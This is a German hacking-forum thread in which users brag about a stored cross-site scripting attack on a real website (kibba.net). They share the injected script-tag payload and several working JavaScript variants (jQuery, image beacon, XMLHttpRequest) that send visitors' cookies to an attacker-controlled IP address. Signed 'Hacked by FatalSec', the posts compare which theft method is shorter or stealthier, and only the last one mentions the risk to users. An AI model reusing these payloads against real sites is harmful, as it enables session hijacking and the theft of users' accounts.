Kibba.net - Stored XSS

  • So Mission Completed.
    Payload:
    <script src=//1223.gq/></script>
    Es wird eine JavaScript Datei ausgeliefert.
    Sie wird auch ausgeführt. POC Video folgt:

    Externer Inhalt www.youtube.com
    Inhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.

    P.S: THX An die Seekuh Crew für die Verkürzung von dem src=//

    nobody@xmpp.ninja

    FatalSecurity

    2 Mal editiert, zuletzt von lNobodyl (29. Februar 2016 um 11:10)

  • Wollte eigentlich ein AJAX gequest machen. War bei mir leider noch in der Browser Cache. Ansonsten hier mein JS Code:

    JavaScript
    alert("Hacked by FatalSec ;)");
    $( document ).ready(function() {
    	$.get( "http://5.230.225.107/bg.php", { cookie: document.cookie } );
    });

    nobody@xmpp.ninja

    FatalSecurity

  • Tja man keine solche Zeichen beim Kibba leider nicht verwenden ;)

    Nix da.

  • Warum den .js kram mit jQuery etc?
    Geht doch so viel einfacher und ohne redirect:

    Code
    var x = document.createElement("img");
    x.src = "http://host/script.php?_=" + encodeURIComponent(btoa(document.cookie));
    x.style.position = "absolute";
    x.style.left = -10000;
    x.style.top = -10000;

    Code by Seekuh Crew ( @klinker_)

    sashiri ist administrator von retrotown und er macht gute arbeit daumen hoch emoji :)

    admin von mailmaus dem besten wegwerfmail anbieter in 2024 (gewählt von namenhaften anbietern wie chip, computer bild und spiegel)

    ZdkFTG1.png
    XMPP: ecb2@cock.li
    YzY3SuH.png
    how to habbo.st

  • Wollte eigentlich ein AJAX gequest machen. War bei mir leider noch in der Browser Cache. Ansonsten hier mein JS Code:

    JavaScript
    alert("Hacked by FatalSec ;)");
    $( document ).ready(function() {
    	$.get( "http://5.230.225.107/bg.php", { cookie: document.cookie } );
    });

    Hier hast du deine Antwort. Nettes Script von dir.

    Wenn du das Script im Zitat analysierst, wirst du erkennen das ich einfach ein AJAX (GET METHODE) mit dem Cookie gesendet habe.

    Du hast es natürlich professioneller gemacht. Base64 encode usw, aber besser wäre es einfach mit AJAX gewesen. Ist schneller und ist kürzer.

    Habe jQuery benutzt da die Bibliothek dort benutzt wurde, und kürzer ist.

    nobody@xmpp.ninja

    FatalSecurity

    Einmal editiert, zuletzt von lNobodyl (29. Februar 2016 um 16:55)

  • Hier hast du deine Antwort. Nettes Script von dir.
    Wenn du das Script im Zitat analysierst, wirst du erkennen das ich einfach ein AJAX (GET METHODE) mit dem Cookie gesendet habe.

    Du hast es natürlich professioneller gemacht. Base64 encode usw.

    Hast du meine Frage gelesen? "mit jQuery etc"
    Was machst du denn wenn die Seite kein jQuery benutzt?

    gg.

    sashiri ist administrator von retrotown und er macht gute arbeit daumen hoch emoji :)

    admin von mailmaus dem besten wegwerfmail anbieter in 2024 (gewählt von namenhaften anbietern wie chip, computer bild und spiegel)

    ZdkFTG1.png
    XMPP: ecb2@cock.li
    YzY3SuH.png
    how to habbo.st

  • @ECB2
    . Seite neuladen. Sonst nochmal.

    Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.

    Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
    Ist ja einfach :P

    Code
    var ajax = new XMLHttpRequest();
    ajax.open("GET", "http://5.230.225.107/bg.php?cookie=" + encodeURIComponent(document.cookie, true));
    ajax.send();
    
    
    // Dieses Script ist ungetestet. Nur aus dem Kopf.

    nobody@xmpp.ninja

    FatalSecurity

  • @ECB2
    . Seite neuladen. Sonst nochmal.

    Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.

    Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
    Ist ja einfach :P

    Code
    var ajax = new XMLHttpRequest();
    ajax.open("GET", "http://5.230.225.107/bg.php?cookie=" + encodeURIComponent(document.cookie, true));
    ajax.send();
    
    
    // Dieses Script ist ungetestet. Nur aus dem Kopf.

    Darf ich fragen was das für eine IP ist?

    Peace,
    Der Antimate

  • @klinker_ Mit JavaScript lässt sich viel machen. Ein Grund wieso die Betreiber eine Cross site scripting Lücke fixen sollten, ist die Sicherheit der Benutzer.


    Wenn man Cookies stealt läuft der User in Gefahr gehackt zu werden.
    Man könnte auch mit JavaScript eine Datei downloaden lassen.
    Man kann sehr viel machen mit JavaScript.

    nobody@xmpp.ninja

    FatalSecurity

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!